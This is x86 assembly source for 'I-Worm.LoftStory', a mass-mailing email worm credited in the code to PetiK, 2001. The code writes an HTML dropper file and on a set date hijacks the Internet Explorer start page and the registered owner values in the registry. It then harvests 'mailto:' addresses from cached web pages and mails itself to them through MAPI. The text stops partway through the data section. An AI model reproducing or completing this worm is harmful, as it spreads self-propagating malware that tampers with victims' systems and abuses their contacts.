CR_HTM: @pushsz "\Loft.htm" push offset Buffer call lstrcat push 00h push FILE_ATTRIBUTE_NORMAL push CREATE_ALWAYS push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset Buffer callx CreateFileA mov [FileHandle],eax push 00h push offset octets push HTMTAILLE push offset htmd push [FileHandle] callx WriteFile push [FileHandle] callx CloseHandle jmp DLL
DATE: push offset SystemTime callx GetSystemTime cmp [SystemTime.wDay],28 jne DLL SHSET: @pushsz "SHLWAPI.dll" callx LoadLibraryA test eax,eax jz DLL mov hdll2,eax @pushsz "SHSetValueA" push hdll2 callx GetProcAddress test eax,eax jz DLL mov setvalue,eax WEB: push 08h @pushsz "http://www.loftstory.fr" push 01h @pushsz "Start Page" @pushsz "Software\Microsoft\Internet Explorer\Main" push HKEY_CURRENT_USER call [setvalue] push 08h @pushsz "LoftStory" push 01h @pushsz "RegisteredOrganization" @pushsz "Software\Microsoft\Windows\CurrentVersion" push HKEY_LOCAL_MACHINE call [setvalue] push 08h @pushsz "Aziz, Kenza, Loanna, etc..." push 01h @pushsz "RegisteredOwner" @pushsz "Software\Microsoft\Windows\CurrentVersion" push HKEY_LOCAL_MACHINE call [setvalue] push [hdll2] callx FreeLibrary push 40h @pushsz "I-Worm.LoftStory" @pushsz "New Worm Internet coded by PetiK (c)2001" push 00h callx MessageBoxA
DLL: @pushsz "WININET.dll" callx LoadLibraryA test eax,eax jz FIN mov hdll,eax @pushsz "InternetGetConnectedState" push hdll callx GetProcAddress test eax,eax jz FIN mov netcheck,eax jmp NET DODO: push 5000 callx Sleep NET: push 00h push offset Temp call [netcheck] dec eax jnz DODO NET_OK: push 40h @pushsz "Loft Story" @pushsz "Welcome to Internet !" push 00h callx MessageBoxA FINDLL: push [hdll] callx FreeLibrary
REG: push offset RegHandle push 001F0000h ; KEY_QUERY_VALUE push 00h @pushsz ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" push HKEY_USERS callx RegOpenKeyExA test eax,eax jnz FIN
push offset BufferSize push offset Buffer push 00h ;ValueType push 00h @pushsz "Cache" push RegHandle callx RegQueryValueExA
push [RegHandle] callx RegCloseKey
TIF_CUR:push offset Buffer callx SetCurrentDirectoryA call FFF
FIN: push 00h callx ExitProcess
FFF: push offset HTM @pushsz "*.htm*" callx FindFirstFileA mov edi,eax cmp eax,-1 je FIN P_HTM: call parse_html FNF: push offset HTM push edi callx FindNextFileA test eax,eax jnz P_HTM FC: push edi callx FindClose ret parse_html: pushad push 00h push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push 00h push FILE_SHARE_READ push GENERIC_READ push offset HTM.FileName callxCreateFileA ;open the file inc eax je FIN dec eax xchg eax,ebx
xor eax,eax push eax push eax push eax push PAGE_READONLY push eax push ebx callx CreateFileMappingA ;create the file mapping test eax,eax je ph_close xchg eax,ebp
xor eax,eax push eax push eax push eax push FILE_MAP_READ push ebp callxMapViewOfFile ;map the file test eax,eax je ph_close2 xchg eax,esi push 00h push ebx callxGetFileSize ;get its size xchg eax,ecx jecxz ph_close3 ls_scan_mail: call @mt db 'mailto:' @mt: pop edi l_scan_mail: pushad push 7 pop ecx rep cmpsb ;search for "mailto:" popad ;string je scan_mail ;check the mail address inc esi loop l_scan_mail ;in a loop ph_close3: push esi callx UnmapViewOfFile ;unmap view of file ph_close2: push ebp callx CloseHandle ;close file mapping ph_close: push ebx callxCloseHandle ;close the file popad ret scan_mail: xor edx,edx add esi,7 mov edi,offset mail_address ;where to store the push edi ;mail address n_char: lodsb cmp al,' ' je s_char cmp al,'"' je e_char cmp al,'''' je e_char cmp al,'@' jne o_a inc edx o_a: stosb jmp n_char s_char: inc esi jmp n_char e_char: xor al,al stosb pop edi test edx,edx ;if EDX=0, mail is not je ls_scan_mail ;valid (no '@')
call mapi_init test eax,eax jne ls_scan_mail call send call close
jmp ls_scan_mail mapi_init: xor eax,eax push offset MAPIHandle push eax push eax push eax push eax push eax callx MAPILogon ret send: xor eax,eax push eax push eax push offset sMessage push eax push [MAPIHandle] callx MAPISendMail ret close: xor eax,eax push eax push eax push eax push 12345678h MAPIHandle = dword ptr $-4 callx MAPILogoff ret add_ad: ;@pushsz "C:\carnet.txt" ;push offset mail_address ;push offset mail_address ;@pushsz "Carnet d'adresses" ;callx WritePrivateProfileStringA ret .data htmd: db '
Internet Explorer
',0dh,0ah db '